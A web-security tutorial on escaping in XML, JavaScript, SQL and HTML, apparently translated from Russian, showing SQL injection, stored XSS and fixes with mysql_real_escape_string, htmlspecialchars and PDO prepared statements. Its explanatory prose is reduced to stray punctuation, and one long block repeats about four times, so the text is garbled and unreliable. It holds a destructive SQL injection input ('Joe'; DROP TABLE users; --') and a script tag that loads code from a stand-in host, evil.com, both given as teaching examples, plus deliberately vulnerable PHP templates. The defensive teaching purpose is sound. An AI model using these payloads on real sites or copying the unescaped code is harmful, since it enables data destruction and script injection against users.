, :
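<?php /* Escaped output: htmlspecialchars() turns <, >, & and quotes into entities, so a post body containing markup is shown as text instead of being rendered. Flags are explicit: ENT_QUOTES also encodes single quotes (the same call then stays safe inside quoted attributes) and 'UTF-8' pins the charset instead of relying on the PHP-version-dependent default. */ ?>
<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>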
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .
Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
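// Prepared statement: the SQL text is sent first and the user value is bound separately,
// so the value is never parsed as SQL and needs no escaping.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() expects an array with one value per "?" placeholder;
// passing the bare string is a type error, so the value is wrapped in an array.
$stmt->execute(array($_POST['name']));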
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
<!-- Deliberately not well-formed: the raw "<" in "x < n" inside <contents> starts a tag, so an XML parser rejects the document. In text content "<" must be written as &lt; (and "&" as &amp;); ">" is conventionally written as &gt;. -->
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
// Author and body as plain JavaScript string literals; the apostrophe in "don't" is harmless inside double quotes.
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
// Unlike XML, "<" and ">" have no special meaning inside a JavaScript string literal, so this needs no escaping.
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
// Deliberately broken: the unescaped inner double quote after "said " terminates the string literal, so the rest of the line is a syntax error.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
// Fixed: the inner quotes are escaped as \" so they stay part of the literal; a literal backslash must in turn be written as \\.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
// A fixed query string: safe only because no user-controlled data is concatenated into it.
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE: $name comes straight from the request and is interpolated into the SQL text unescaped,
// so a single quote in the input ends the literal and whatever follows is run as SQL (SQL injection).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php /* VULNERABLE: username and body are echoed into HTML without htmlspecialchars(), so markup in a post body is rendered as markup instead of text (stored XSS). */ ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escapes the characters MySQL treats specially inside a string literal (quotes, backslash, NUL, line breaks)
// so a quote in user input can no longer terminate the literal. It escapes according to the current
// connection charset, so that charset must be set first (mysql_set_charset()). ext/mysql itself was
// deprecated in PHP 5.5 and removed in PHP 7.0; prepared statements are the lasting fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
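<?php /* Escaped output: htmlspecialchars() turns <, >, & and quotes into entities, so a post body containing markup is shown as text instead of being rendered. Flags are explicit: ENT_QUOTES also encodes single quotes (the same call then stays safe inside quoted attributes) and 'UTF-8' pins the charset instead of relying on the PHP-version-dependent default. */ ?>
<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>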
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .
Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
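// Prepared statement: the SQL text is sent first and the user value is bound separately,
// so the value is never parsed as SQL and needs no escaping.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() expects an array with one value per "?" placeholder;
// passing the bare string is a type error, so the value is wrapped in an array.
$stmt->execute(array($_POST['name']));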
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
<!-- Deliberately not well-formed: the raw "<" in "x < n" inside <contents> starts a tag, so an XML parser rejects the document. In text content "<" must be written as &lt; (and "&" as &amp;); ">" is conventionally written as &gt;. -->
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
// Author and body as plain JavaScript string literals; the apostrophe in "don't" is harmless inside double quotes.
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
// Unlike XML, "<" and ">" have no special meaning inside a JavaScript string literal, so this needs no escaping.
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
// Deliberately broken: the unescaped inner double quote after "said " terminates the string literal, so the rest of the line is a syntax error.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
// Fixed: the inner quotes are escaped as \" so they stay part of the literal; a literal backslash must in turn be written as \\.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
// A fixed query string: safe only because no user-controlled data is concatenated into it.
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE: $name comes straight from the request and is interpolated into the SQL text unescaped,
// so a single quote in the input ends the literal and whatever follows is run as SQL (SQL injection).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php /* VULNERABLE: username and body are echoed into HTML without htmlspecialchars(), so markup in a post body is rendered as markup instead of text (stored XSS). */ ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escapes the characters MySQL treats specially inside a string literal (quotes, backslash, NUL, line breaks)
// so a quote in user input can no longer terminate the literal. It escapes according to the current
// connection charset, so that charset must be set first (mysql_set_charset()). ext/mysql itself was
// deprecated in PHP 5.5 and removed in PHP 7.0; prepared statements are the lasting fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
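<?php /* Escaped output: htmlspecialchars() turns <, >, & and quotes into entities, so a post body containing markup is shown as text instead of being rendered. Flags are explicit: ENT_QUOTES also encodes single quotes (the same call then stays safe inside quoted attributes) and 'UTF-8' pins the charset instead of relying on the PHP-version-dependent default. */ ?>
<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>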
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .
Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
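// Prepared statement: the SQL text is sent first and the user value is bound separately,
// so the value is never parsed as SQL and needs no escaping.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() expects an array with one value per "?" placeholder;
// passing the bare string is a type error, so the value is wrapped in an array.
$stmt->execute(array($_POST['name']));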
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
<!-- Deliberately not well-formed: the raw "<" in "x < n" inside <contents> starts a tag, so an XML parser rejects the document. In text content "<" must be written as &lt; (and "&" as &amp;); ">" is conventionally written as &gt;. -->
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
// Author and body as plain JavaScript string literals; the apostrophe in "don't" is harmless inside double quotes.
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
// Unlike XML, "<" and ">" have no special meaning inside a JavaScript string literal, so this needs no escaping.
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
// Deliberately broken: the unescaped inner double quote after "said " terminates the string literal, so the rest of the line is a syntax error.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
// Fixed: the inner quotes are escaped as \" so they stay part of the literal; a literal backslash must in turn be written as \\.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
// A fixed query string: safe only because no user-controlled data is concatenated into it.
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE: $name comes straight from the request and is interpolated into the SQL text unescaped,
// so a single quote in the input ends the literal and whatever follows is run as SQL (SQL injection).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php /* VULNERABLE: username and body are echoed into HTML without htmlspecialchars(), so markup in a post body is rendered as markup instead of text (stored XSS). */ ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escapes the characters MySQL treats specially inside a string literal (quotes, backslash, NUL, line breaks)
// so a quote in user input can no longer terminate the literal. It escapes according to the current
// connection charset, so that charset must be set first (mysql_set_charset()). ext/mysql itself was
// deprecated in PHP 5.5 and removed in PHP 7.0; prepared statements are the lasting fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
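<?php /* Escaped output: htmlspecialchars() turns <, >, & and quotes into entities, so a post body containing markup is shown as text instead of being rendered. Flags are explicit: ENT_QUOTES also encodes single quotes (the same call then stays safe inside quoted attributes) and 'UTF-8' pins the charset instead of relying on the PHP-version-dependent default. */ ?>
<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>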
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .
Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
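// Prepared statement: the SQL text is sent first and the user value is bound separately,
// so the value is never parsed as SQL and needs no escaping.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() expects an array with one value per "?" placeholder;
// passing the bare string is a type error, so the value is wrapped in an array.
$stmt->execute(array($_POST['name']));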
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
<!-- Deliberately not well-formed: the raw "<" in "x < n" inside <contents> starts a tag, so an XML parser rejects the document. In text content "<" must be written as &lt; (and "&" as &amp;); ">" is conventionally written as &gt;. -->
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
// Author and body as plain JavaScript string literals; the apostrophe in "don't" is harmless inside double quotes.
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
// Unlike XML, "<" and ">" have no special meaning inside a JavaScript string literal, so this needs no escaping.
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
// Deliberately broken: the unescaped inner double quote after "said " terminates the string literal, so the rest of the line is a syntax error.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
// Fixed: the inner quotes are escaped as \" so they stay part of the literal; a literal backslash must in turn be written as \\.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
// A fixed query string: safe only because no user-controlled data is concatenated into it.
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE: $name comes straight from the request and is interpolated into the SQL text unescaped,
// so a single quote in the input ends the literal and whatever follows is run as SQL (SQL injection).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php /* VULNERABLE: username and body are echoed into HTML without htmlspecialchars(), so markup in a post body is rendered as markup instead of text (stored XSS). */ ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escapes the characters MySQL treats specially inside a string literal (quotes, backslash, NUL, line breaks)
// so a quote in user input can no longer terminate the literal. It escapes according to the current
// connection charset, so that charset must be set first (mysql_set_charset()). ext/mysql itself was
// deprecated in PHP 5.5 and removed in PHP 7.0; prepared statements are the lasting fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
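<?php /* Escaped output: htmlspecialchars() turns <, >, & and quotes into entities, so a post body containing markup is shown as text instead of being rendered. Flags are explicit: ENT_QUOTES also encodes single quotes (the same call then stays safe inside quoted attributes) and 'UTF-8' pins the charset instead of relying on the PHP-version-dependent default. */ ?>
<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>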
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .
Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
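// Prepared statement: the SQL text is sent first and the user value is bound separately,
// so the value is never parsed as SQL and needs no escaping.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() expects an array with one value per "?" placeholder;
// passing the bare string is a type error, so the value is wrapped in an array.
$stmt->execute(array($_POST['name']));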
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
<!-- Deliberately not well-formed: the raw "<" in "x < n" inside <contents> starts a tag, so an XML parser rejects the document. In text content "<" must be written as &lt; (and "&" as &amp;); ">" is conventionally written as &gt;. -->
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
// Author and body as plain JavaScript string literals; the apostrophe in "don't" is harmless inside double quotes.
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
// Unlike XML, "<" and ">" have no special meaning inside a JavaScript string literal, so this needs no escaping.
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
// Deliberately broken: the unescaped inner double quote after "said " terminates the string literal, so the rest of the line is a syntax error.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
// Fixed: the inner quotes are escaped as \" so they stay part of the literal; a literal backslash must in turn be written as \\.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
// A fixed query string: safe only because no user-controlled data is concatenated into it.
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE: $name comes straight from the request and is interpolated into the SQL text unescaped,
// so a single quote in the input ends the literal and whatever follows is run as SQL (SQL injection).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php /* VULNERABLE: username and body are echoed into HTML without htmlspecialchars(), so markup in a post body is rendered as markup instead of text (stored XSS). */ ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escapes the characters MySQL treats specially inside a string literal (quotes, backslash, NUL, line breaks)
// so a quote in user input can no longer terminate the literal. It escapes according to the current
// connection charset, so that charset must be set first (mysql_set_charset()). ext/mysql itself was
// deprecated in PHP 5.5 and removed in PHP 7.0; prepared statements are the lasting fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
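<?php /* Escaped output: htmlspecialchars() turns <, >, & and quotes into entities, so a post body containing markup is shown as text instead of being rendered. Flags are explicit: ENT_QUOTES also encodes single quotes (the same call then stays safe inside quoted attributes) and 'UTF-8' pins the charset instead of relying on the PHP-version-dependent default. */ ?>
<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>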
htmlspecialchars
, , . :
